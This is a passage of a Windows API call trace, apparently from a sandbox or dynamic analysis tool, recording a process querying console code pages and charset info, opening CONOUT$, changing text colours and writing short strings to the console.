lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.252] GetLastError () returned 0xcb [0160.252] GetConsoleOutputCP () returned 0x1b5 [0160.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.252] GetLastError () returned 0xcb [0160.252] GetConsoleOutputCP () returned 0x1b5 [0160.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.252] GetLastError () returned 0xcb [0160.252] GetConsoleOutputCP () returned 0x1b5 [0160.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.252] GetLastError () returned 0xcb [0160.252] GetConsoleOutputCP () returned 0x1b5 [0160.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.252] GetLastError () returned 0xcb [0160.252] GetConsoleOutputCP () returned 0x1b5 [0160.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.253] GetLastError () returned 0xcb [0160.253] GetConsoleOutputCP () returned 0x1b5 [0160.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.253] GetLastError () returned 0xcb [0160.253] GetConsoleOutputCP () returned 0x1b5 [0160.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.253] GetLastError () returned 0xcb [0160.253] GetConsoleOutputCP () returned 0x1b5 [0160.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.253] GetLastError () returned 0xcb [0160.253] GetConsoleOutputCP () returned 0x1b5 [0160.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.253] GetLastError () returned 0xcb [0160.253] GetConsoleOutputCP () returned 0x1b5 [0160.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.253] GetLastError () returned 0xcb [0160.253] GetConsoleOutputCP () returned 0x1b5 [0160.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.254] GetLastError () returned 0xcb [0160.254] GetConsoleOutputCP () returned 0x1b5 [0160.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.254] GetLastError () returned 0xcb [0160.254] GetConsoleOutputCP () returned 0x1b5 [0160.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.254] GetLastError () returned 0xcb [0160.254] GetConsoleOutputCP () returned 0x1b5 [0160.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.254] GetLastError () returned 0xcb [0160.254] GetConsoleOutputCP () returned 0x1b5 [0160.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.254] GetLastError () returned 0xcb [0160.254] GetConsoleOutputCP () returned 0x1b5 [0160.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.254] GetLastError () returned 0xcb [0160.254] GetConsoleOutputCP () returned 0x1b5 [0160.255] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.255] GetLastError () returned 0xcb [0160.255] GetConsoleOutputCP () returned 0x1b5 [0160.255] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.255] GetLastError () returned 0xcb [0160.255] GetConsoleOutputCP () returned 0x1b5 [0160.255] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.255] GetLastError () returned 0xcb [0160.255] GetConsoleOutputCP () returned 0x1b5 [0160.255] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.255] GetLastError () returned 0xcb [0160.255] GetConsoleOutputCP () returned 0x1b5 [0160.255] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.255] GetLastError () returned 0xcb [0160.255] GetConsoleOutputCP () returned 0x1b5 [0160.255] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.256] GetLastError () returned 0xcb [0160.256] GetConsoleOutputCP () returned 0x1b5 [0160.256] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.256] GetLastError () returned 0xcb [0160.256] GetConsoleOutputCP () returned 0x1b5 [0160.256] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.256] GetLastError () returned 0xcb [0160.256] GetConsoleOutputCP () returned 0x1b5 [0160.256] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.256] GetLastError () returned 0xcb [0160.256] GetConsoleOutputCP () returned 0x1b5 [0160.256] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.256] GetLastError () returned 0xcb [0160.256] GetConsoleOutputCP () returned 0x1b5 [0160.256] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.256] GetLastError () returned 0xcb [0160.256] GetConsoleOutputCP () returned 0x1b5 [0160.257] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.257] GetLastError () returned 0xcb [0160.257] GetConsoleOutputCP () returned 0x1b5 [0160.257] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.257] GetLastError () returned 0xcb [0160.257] GetConsoleOutputCP () returned 0x1b5 [0160.257] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.257] GetLastError () returned 0xcb [0160.257] GetConsoleOutputCP () returned 0x1b5 [0160.257] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.257] GetLastError () returned 0xcb [0160.257] GetConsoleOutputCP () returned 0x1b5 [0160.257] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.257] GetLastError () returned 0xcb [0160.257] GetConsoleOutputCP () returned 0x1b5 [0160.257] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.257] GetLastError () returned 0xcb [0160.258] GetConsoleOutputCP () returned 0x1b5 [0160.258] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.258] GetLastError () returned 0xcb [0160.258] GetConsoleOutputCP () returned 0x1b5 [0160.258] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.258] GetLastError () returned 0xcb [0160.258] GetConsoleOutputCP () returned 0x1b5 [0160.258] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.258] GetLastError () returned 0xcb [0160.258] GetConsoleOutputCP () returned 0x1b5 [0160.258] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.258] GetLastError () returned 0xcb [0160.258] GetConsoleOutputCP () returned 0x1b5 [0160.258] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.258] GetLastError () returned 0xcb [0160.258] GetConsoleOutputCP () returned 0x1b5 [0160.259] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.259] GetLastError () returned 0xcb [0160.259] GetConsoleOutputCP () returned 0x1b5 [0160.259] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.259] GetLastError () returned 0xcb [0160.259] GetConsoleOutputCP () returned 0x1b5 [0160.259] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.259] GetLastError () returned 0xcb [0160.259] GetConsoleOutputCP () returned 0x1b5 [0160.259] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.259] GetLastError () returned 0xcb [0160.259] GetConsoleOutputCP () returned 0x1b5 [0160.259] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.259] GetLastError () returned 0xcb [0160.259] GetConsoleOutputCP () returned 0x1b5 [0160.259] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.259] GetLastError () returned 0xcb [0160.259] GetConsoleOutputCP () returned 0x1b5 [0160.260] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.260] GetLastError () returned 0xcb [0160.260] GetConsoleOutputCP () returned 0x1b5 [0160.260] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.260] GetLastError () returned 0xcb [0160.260] GetConsoleOutputCP () returned 0x1b5 [0160.260] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.260] GetLastError () returned 0xcb [0160.260] GetConsoleOutputCP () returned 0x1b5 [0160.260] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.260] GetLastError () returned 0xcb [0160.260] GetConsoleOutputCP () returned 0x1b5 [0160.260] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.260] GetLastError () returned 0xcb [0160.260] GetConsoleOutputCP () returned 0x1b5 [0160.260] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.260] GetLastError () returned 0xcb [0160.260] GetConsoleOutputCP () returned 0x1b5 [0160.261] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.261] GetLastError () returned 0xcb [0160.261] GetConsoleOutputCP () returned 0x1b5 [0160.261] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.261] GetLastError () returned 0xcb [0160.261] GetConsoleOutputCP () returned 0x1b5 [0160.261] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.261] GetLastError () returned 0xcb [0160.261] GetConsoleOutputCP () returned 0x1b5 [0160.261] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.261] GetLastError () returned 0xcb [0160.261] GetConsoleOutputCP () returned 0x1b5 [0160.261] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.261] GetLastError () returned 0xcb [0160.261] GetConsoleOutputCP () returned 0x1b5 [0160.262] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.262] GetLastError () returned 0xcb [0160.262] GetConsoleOutputCP () returned 0x1b5 [0160.262] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.262] GetLastError () returned 0xcb [0160.262] GetConsoleOutputCP () returned 0x1b5 [0160.262] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.262] GetLastError () returned 0xcb [0160.262] GetConsoleOutputCP () returned 0x1b5 [0160.262] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.262] GetLastError () returned 0xcb [0160.262] GetConsoleOutputCP () returned 0x1b5 [0160.262] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.262] GetLastError () returned 0xcb [0160.262] GetConsoleOutputCP () returned 0x1b5 [0160.262] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.262] GetLastError () returned 0xcb [0160.262] GetConsoleOutputCP () returned 0x1b5 [0160.263] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.263] GetLastError () returned 0xcb [0160.263] GetConsoleOutputCP () returned 0x1b5 [0160.263] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.263] GetLastError () returned 0xcb [0160.263] GetConsoleOutputCP () returned 0x1b5 [0160.263] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.263] GetLastError () returned 0xcb [0160.263] GetConsoleOutputCP () returned 0x1b5 [0160.263] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.263] GetLastError () returned 0xcb [0160.263] GetConsoleOutputCP () returned 0x1b5 [0160.263] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.263] GetLastError () returned 0xcb [0160.263] GetConsoleOutputCP () returned 0x1b5 [0160.263] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.263] GetLastError () returned 0xcb [0160.263] GetConsoleOutputCP () returned 0x1b5 [0160.264] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.264] GetLastError () returned 0xcb [0160.264] GetConsoleOutputCP () returned 0x1b5 [0160.264] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.264] GetLastError () returned 0xcb [0160.264] GetConsoleOutputCP () returned 0x1b5 [0160.264] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.264] GetLastError () returned 0xcb [0160.264] GetConsoleOutputCP () returned 0x1b5 [0160.264] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.264] GetLastError () returned 0xcb [0160.264] GetConsoleOutputCP () returned 0x1b5 [0160.264] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.264] GetLastError () returned 0xcb [0160.264] GetConsoleOutputCP () returned 0x1b5 [0160.265] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.265] GetLastError () returned 0xcb [0160.265] GetConsoleOutputCP () returned 0x1b5 [0160.265] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.265] GetLastError () returned 0xcb [0160.265] GetConsoleOutputCP () returned 0x1b5 [0160.265] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.265] GetLastError () returned 0xcb [0160.265] GetConsoleOutputCP () returned 0x1b5 [0160.265] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.265] GetLastError () returned 0xcb [0160.265] GetConsoleOutputCP () returned 0x1b5 [0160.265] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.265] GetLastError () returned 0xcb [0160.265] GetConsoleOutputCP () returned 0x1b5 [0160.265] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.265] GetLastError () returned 0xcb [0160.265] GetConsoleOutputCP () returned 0x1b5 [0160.266] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.266] GetLastError () returned 0xcb [0160.266] GetConsoleOutputCP () returned 0x1b5 [0160.266] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.266] GetLastError () returned 0xcb [0160.266] GetConsoleOutputCP () returned 0x1b5 [0160.266] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.266] GetLastError () returned 0xcb [0160.266] GetConsoleOutputCP () returned 0x1b5 [0160.266] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.266] GetLastError () returned 0xcb [0160.271] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0160.272] GetLastError () returned 0xcb [0160.272] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.272] GetLastError () returned 0xcb [0160.272] GetConsoleOutputCP () returned 0x1b5 [0160.272] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.272] GetLastError () returned 0xcb [0160.274] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0160.274] GetLastError () returned 0xcb [0160.274] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x601ef20 | out: lpMode=0x601ef20) returned 1 [0160.313] GetLastError () returned 0xcb [0160.317] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0160.317] GetLastError () returned 0xcb [0160.317] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.317] GetLastError () returned 0xcb [0160.321] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0160.321] GetLastError () returned 0xcb [0160.321] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.321] GetLastError () returned 0xcb [0160.325] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.325] GetLastError () returned 0xcb [0160.325] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.326] GetLastError () returned 0xcb [0160.328] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0160.328] GetLastError () returned 0xcb [0160.329] CloseHandle (hObject=0x23) returned 1 [0160.329] GetLastError () returned 0xcb [0160.333] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.333] GetLastError () returned 0xcb [0160.333] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.334] GetLastError () returned 0xcb [0160.334] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0160.334] GetLastError () returned 0xcb [0160.334] CloseHandle (hObject=0x23) returned 1 [0160.335] GetLastError () returned 0xcb [0160.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.335] GetLastError () returned 0xcb [0160.335] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x601eeb8 | out: lpMode=0x601eeb8) returned 1 [0160.335] GetLastError () returned 0xcb [0160.339] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.339] GetLastError () returned 0xcb [0160.339] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.339] GetLastError () returned 0xcb [0160.363] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2df6204*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df6204*, lpNumberOfCharsWritten=0x601ee9c*=0x4f) returned 1 [0160.373] GetLastError () returned 0xcb [0160.373] CloseHandle (hObject=0x23) returned 1 [0160.378] GetLastError () returned 0xcb [0160.382] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.383] GetLastError () returned 0xcb [0160.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.383] GetLastError () returned 0xcb [0160.383] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0160.384] GetLastError () returned 0xcb [0160.384] CloseHandle (hObject=0x23) returned 1 [0160.388] GetLastError () returned 0xcb [0160.392] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.392] GetLastError () returned 0xcb [0160.392] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.392] GetLastError () returned 0xcb [0160.393] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0160.393] GetLastError () returned 0xcb [0160.393] CloseHandle (hObject=0x23) returned 1 [0160.397] GetLastError () returned 0xcb [0160.400] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.401] GetLastError () returned 0xcb [0160.401] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0160.401] GetLastError () returned 0xcb [0160.401] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0160.402] GetLastError () returned 0xcb [0160.402] CloseHandle (hObject=0x23) returned 1 [0160.406] GetLastError () returned 0xcb [0160.410] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.411] GetLastError () returned 0xcb [0160.411] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.411] GetLastError () returned 0xcb [0160.411] GetConsoleOutputCP () returned 0x1b5 [0160.415] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.415] GetLastError () 